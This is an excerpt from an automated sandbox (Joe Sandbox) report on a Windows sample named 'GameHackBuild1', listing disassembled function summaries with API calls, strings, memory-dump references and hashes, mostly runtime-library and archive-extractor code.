                                      Function 00A2C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,3FE85006,00A23F66,00000000,00000000,00A24F9B,?,00A24F9B,?,00000001,00A23F66,3FE85006,00000001,00A24F9B,00A24F9B), ref: 00A2C0E6
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A2C16F
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A2C181
                                      • __freea.LIBCMT ref: 00A2C18A
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: c0c50ffca38cfb2892084f1d6d310bd8dcb8d39874ef1e7aa6b886e5ad02cc87
                                      • Instruction ID: a93a63a386e0623f5851a21891488b014e0ce9dc2bd46327cc268f35c393affc
                                      • Opcode Fuzzy Hash: c0c50ffca38cfb2892084f1d6d310bd8dcb8d39874ef1e7aa6b886e5ad02cc87
                                      • Instruction Fuzzy Hash: B4319D72A0022AABDF25CF68EC46DAE7BA5EB44720F150228FC0596151E735CD61CBA0
                                      Function 00A22503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00A2251A
                                        • Part of subcall function 00A22B52: ___AdjustPointer.LIBCMT ref: 00A22B9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00A22531
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00A22543
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00A22567
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction ID: 42e9bb1c7a132408b4157787edab476dd93eb46f008c4a535af681a6bd557356
                                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction Fuzzy Hash: 5F012532000118BFCF129F69ED01EDA3BBAEF58714F058124FD1866120C376E9A1EBA1
                                      Function 00A19DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00A19DBE
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A19DCD
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A19DDB
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A19DE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 2918052e8a795c240f4a5f006118d2dfae4ad3352b2300c7bed9a49c2227c63d
                                      • Instruction ID: 26a09c81858f20c4fae62ed02d9e9eb2868746805e0df57d38c2e05681b57e13
                                      • Opcode Fuzzy Hash: 2918052e8a795c240f4a5f006118d2dfae4ad3352b2300c7bed9a49c2227c63d
                                      • Instruction Fuzzy Hash: 82E0EC39985A21A7D3209BE5BD0DB8F3B74AB0AB62F060005FB05A6190DAB44846CB90
                                      Function 00A22016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00A22016
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00A2201B
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A22020
                                        • Part of subcall function 00A2310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00A2311F
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A22035
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction ID: 4d2816a3c64bd502d2bbecd7e21a4841cb91aa5e0763e70e5cef61d02fa40565
                                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction Fuzzy Hash: E6C04836018670F41C223BBE33027BD0B000D63BC5BA226F2ED801B543DE0E0F2AA232
                                      Function 00A19F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A19DF1: GetDC.USER32(00000000), ref: 00A19DF5
                                        • Part of subcall function 00A19DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A19E00
                                        • Part of subcall function 00A19DF1: ReleaseDC.USER32(00000000,00000000), ref: 00A19E0B
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00A19F8D
                                        • Part of subcall function 00A1A1E5: GetDC.USER32(00000000), ref: 00A1A1EE
                                        • Part of subcall function 00A1A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00A1A21D
                                        • Part of subcall function 00A1A1E5: ReleaseDC.USER32(00000000,?), ref: 00A1A2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: (
                                      • API String ID: 1061551593-3887548279
                                      • Opcode ID: 49ce8299d188e5bf269a0d2f264320fc26f7c8b3ea35480c8d37af5a7f17c1c9
                                      • Instruction ID: 2622ba8bf5eb3cf9781cf40f70758bb755b82294a7f7d225b8a898517bcfd9b1
                                      • Opcode Fuzzy Hash: 49ce8299d188e5bf269a0d2f264320fc26f7c8b3ea35480c8d37af5a7f17c1c9
                                      • Instruction Fuzzy Hash: F8811371608214AFC614DFA9CC44A6BBBF9FF98700F00491DF98AD7260CB75AD06CB52
                                      Function 00A10E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: f2b7016e06f56a0838b56bf906c677226ee5deecfd424dec57a5d2a87e8f81eb
                                      • Instruction ID: 5e798fefcf7a5a47df63c7d8cb53b895fc252430d8a25df75fbb042a89317bb3
                                      • Opcode Fuzzy Hash: f2b7016e06f56a0838b56bf906c677226ee5deecfd424dec57a5d2a87e8f81eb
                                      • Instruction Fuzzy Hash: 8A51B73568C704FEEA211AE4DD43FF67A76EB08B00F248906F7DB648D5C6E255D0A613
                                      Function 00A2A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00A2AA84
                                        • Part of subcall function 00A28849: IsProcessorFeaturePresent.KERNEL32(00000017,00A28838,0000002C,00A3BC40,00A2BA17,00000000,00000000,00A29028,?,?,00A28845,00000000,00000000,00000000,00000000,00000000), ref: 00A2884B
                                        • Part of subcall function 00A28849: GetCurrentProcess.KERNEL32(C0000417,00A3BC40,0000002C,00A28576,00000016,00A29028), ref: 00A2886D
                                        • Part of subcall function 00A28849: TerminateProcess.KERNEL32(00000000), ref: 00A28874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 8da25cd4491836bc39a0a284343e386c4d4306b0af38769002cbed5a576452a2
                                      • Instruction ID: ac0762c97351b40225c169ae6814ac4e547b770662b630e1094ae4b58deea03a
                                      • Opcode Fuzzy Hash: 8da25cd4491836bc39a0a284343e386c4d4306b0af38769002cbed5a576452a2
                                      • Instruction Fuzzy Hash: BD51B071E0022AAFDF14DFACD981AADB7B5EF68310F258179E844E7300E6359E41CB51
                                      Function 00A0772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A07730
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A078CC
                                        • Part of subcall function 00A0A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A458
                                        • Part of subcall function 00A0A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A489
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$Attributes$H_prologTime
                                      • String ID: :
                                      • API String ID: 1861295151-336475711
                                      • Opcode ID: 1bf9919cce236f9d7391c65d6fedef3bf602a31a5e46ca559b1f5104a7f5951b
                                      • Instruction ID: 991df0c6d75a481f39ba21496e27c76995b33234eff5590b3713490124225fd0
                                      • Opcode Fuzzy Hash: 1bf9919cce236f9d7391c65d6fedef3bf602a31a5e46ca559b1f5104a7f5951b
                                      • Instruction Fuzzy Hash: 73414371C0525CAADB25EB50EE55EEEB37CAF45340F0080DAB609A20D2DB746F88CF61
                                      Function 00A0B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UNC$\\?\
                                      • API String ID: 0-253988292
                                      • Opcode ID: 900dabe9da1e24642be7fc51a660d4f9fce64123d38d653b42d1941bbe73a8be
                                      • Instruction ID: 5cae316a80b40a1ae468a35eed28ec0184c9fd94a6d2c294365ce246ad98c46e
                                      • Opcode Fuzzy Hash: 900dabe9da1e24642be7fc51a660d4f9fce64123d38d653b42d1941bbe73a8be
                                      • Instruction Fuzzy Hash: 9541AF3586121EBACF20AF61EE41EEB77A9AF45790F104425F814A71D2E770DA50CA74
                                      Function 00A18FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Shell.Explorer$about:blank
                                      • API String ID: 0-874089819
                                      • Opcode ID: 4335bc94f7791ef372a4f60466853f6055ca60dbea5b903580629b0ccd2aec45
                                      • Instruction ID: e3396996968cd398ecfb55465f64273669bc3c92bfe0f792925e91536fc309eb
                                      • Opcode Fuzzy Hash: 4335bc94f7791ef372a4f60466853f6055ca60dbea5b903580629b0ccd2aec45
                                      • Instruction Fuzzy Hash: 53218071604304AFDB08DF68CCA5AAB77A9FF48711B14856DF8098B282DB74EC81CB60
                                      Function 00A0EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A0EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A0EB92
                                        • Part of subcall function 00A0EB73: GetProcAddress.KERNEL32(00A481C0,CryptUnprotectMemory), ref: 00A0EBA2
                                      • GetCurrentProcessId.KERNEL32(?,?,?,00A0EBEC), ref: 00A0EC84
                                      Strings
                                      • CryptProtectMemory failed, xrefs: 00A0EC3B
                                      • CryptUnprotectMemory failed, xrefs: 00A0EC7C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: ede37f8de4163b5e264aa777e100c2d2c7e35501192f4f9c91f119737c2289e1
                                      • Instruction ID: 09acac824aed66305e7d28db14e51613275bfe61e7a9245c73c388cce984bca4
                                      • Opcode Fuzzy Hash: ede37f8de4163b5e264aa777e100c2d2c7e35501192f4f9c91f119737c2289e1
                                      • Instruction Fuzzy Hash: FE115932A0422CAFFB14DB34FE06AAE3754AF41714B04451AFC056B2C1CB7B9E82A7D0
                                      Function 00A0130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A0DA98: _swprintf.LIBCMT ref: 00A0DABE
                                        • Part of subcall function 00A0DA98: _strlen.LIBCMT ref: 00A0DADF
                                        • Part of subcall function 00A0DA98: SetDlgItemTextW.USER32(?,00A3E154,?), ref: 00A0DB3F
                                        • Part of subcall function 00A0DA98: GetWindowRect.USER32(?,?), ref: 00A0DB79
                                        • Part of subcall function 00A0DA98: GetClientRect.USER32(?,?), ref: 00A0DB85
                                      • GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                      • SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: 0
                                      • API String ID: 2622349952-4108050209
                                      • Opcode ID: c9f057c03f9dfb22b772972150a3c7b48c6fd22411ba6c30fec7a75fc5ea94ac
                                      • Instruction ID: 4cd950c5cfaf70da2721d30a5b0588aaaeeb5293d30cf65750cc60f92536897b
                                      • Opcode Fuzzy Hash: c9f057c03f9dfb22b772972150a3c7b48c6fd22411ba6c30fec7a75fc5ea94ac
                                      • Instruction Fuzzy Hash: 1EF0AF7110434CABDFB54FA0AC49BED3BE8BB11345F088414FE495A5E1C778C996EB51
                                      Function 00A1084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00A1096D,?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10854
                                      • GetLastError.KERNEL32(?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10860
                                        • Part of subcall function 00A06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A06EAF
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A10869
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
                                      • Opcode ID: e71792c47d0f819bb27d7b60d3656cd2494884289b70939ce2e768c8baeb11d9
                                      • Instruction ID: f553e692766851d62fbbddb1e7f791e20dd68f89988f95c65b1f55346e34244d
                                      • Opcode Fuzzy Hash: e71792c47d0f819bb27d7b60d3656cd2494884289b70939ce2e768c8baeb11d9
                                      • Instruction Fuzzy Hash: B9D05E3690C53137CA1427A4FD0ADEFB9059F52734F240725F639A51F5DA2109A282E5
                                      Function 00A0DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00A0D32F,?), ref: 00A0DA53
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A0D32F,?), ref: 00A0DA61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: 3bc6c7dc366862e6ccaf47155a862c5c5ec914400823c12301446fdc64cffbf0
                                      • Instruction ID: 8263b3b3a1d684e3a45f08e44d25e8c8ad0c592dab4c7c910046fd1ba8c10b46
                                      • Opcode Fuzzy Hash: 3bc6c7dc366862e6ccaf47155a862c5c5ec914400823c12301446fdc64cffbf0
                                      • Instruction Fuzzy Hash: C5C0123338D350B6DF3457A07D0DB432A486B11B52F05048CB141DE5D0D5E5C9418650

                                      Execution Graph

                                      Execution Coverage:7.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:33
                                      Total number of Limit Nodes:5
